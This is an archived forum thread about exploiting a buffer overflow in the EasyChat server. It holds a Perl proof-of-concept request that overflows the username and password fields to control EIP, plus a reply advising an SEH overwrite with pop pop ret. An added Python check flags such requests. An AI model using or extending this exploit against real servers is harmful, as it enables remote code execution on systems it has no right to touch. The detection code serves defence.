Luigi Auriemma aluigi.org (ARCHIVE-ONLY FORUM!)

rab
Post subject: EasyChat server code execution
Posted: 10 Sep 2007 22:09
Joined: 14 Aug 2007 15:47 Posts: 1

Hey, I'm practicing exploitation and I thought I would try this. So far I can overflow the buffer and control EIP. The problem is no registers point to my shellcode, so how can I get code execution to work?
[code]
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

# Oversized value sent in both the username and password fields
my $expl0it = "\x90" x 220;
$expl0it .= "A" x 4;
$expl0it .= "C" x 12;

my $sock = IO::Socket::INET->new( PeerAddr => "localhost",
                                  PeerPort => 80,
                                  Proto    => 'tcp' ) || die "Error connecting: $!\n";
print $sock "GET /chat.ghp?username=".$expl0it."&password=".$expl0it."&room=1&sex=2 HTTP/1.1\r\nHost: localhost\r\n\r\n";
close($sock);
[/code]
thanks

n00b
Post subject:
Posted: 12 Sep 2007 13:01
Joined: 14 Aug 2007 13:32 Posts: 71

Well, if no registers hold your shellcode or the user-supplied data, try to overwrite the SEH handlers; that is your only option. I've seen this loads of times: EIP gets overwritten and nothing holds our shellcode. Add more buffer and see if you can control the SEH handlers. Then you can just do a pop pop ret into the stack.
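
From the defender's side, the request in the first post stands out on the wire: its username and password values are each 236 bytes long and mostly one repeated raw 0x90 byte. The Python check below is an added example, not part of either post; the 64-byte limit, the 16-byte run threshold and the function names are assumptions, and the sample request lines are constructed.

```python
# Added example: flag suspicious query parameters in a raw HTTP request line.
MAX_PARAM_LEN = 64       # assumed per-parameter limit; tune to the application
MAX_SAME_BYTE_RUN = 16   # assumed threshold for a run of one repeated byte


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect_request_line(line: bytes) -> list:
    """Return findings for one request line such as b'GET /x?a=b HTTP/1.1'."""
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    _, _, query = parts[1].partition(b"?")
    findings = []
    for pair in filter(None, query.split(b"&")):
        name, _, value = pair.partition(b"=")
        label = name.decode("ascii", "replace")
        if len(value) > MAX_PARAM_LEN:
            findings.append(f"{label}: {len(value)} bytes exceeds {MAX_PARAM_LEN}")
        if any(b < 0x21 or b > 0x7E for b in value):
            findings.append(f"{label}: raw non-printable or non-ASCII bytes")
        if longest_run(value) >= MAX_SAME_BYTE_RUN:
            findings.append(f"{label}: {longest_run(value)}-byte run of one byte")
    return findings


# Constructed samples: a normal login and a request shaped like the one posted.
BENIGN = b"GET /chat.ghp?username=alice&password=s3cret&room=1&sex=2 HTTP/1.1\r\n"
FILLER = b"\x90" * 220 + b"A" * 4 + b"C" * 12
OVERSIZED = (b"GET /chat.ghp?username=" + FILLER + b"&password=" + FILLER
             + b"&room=1&sex=2 HTTP/1.1\r\n")

if __name__ == "__main__":
    for sample in (BENIGN, OVERSIZED):
        print(inspect_request_line(sample) or "ok")
```

The same three checks can run in a reverse proxy or over captured request logs, provided the logs keep the raw bytes of the request line.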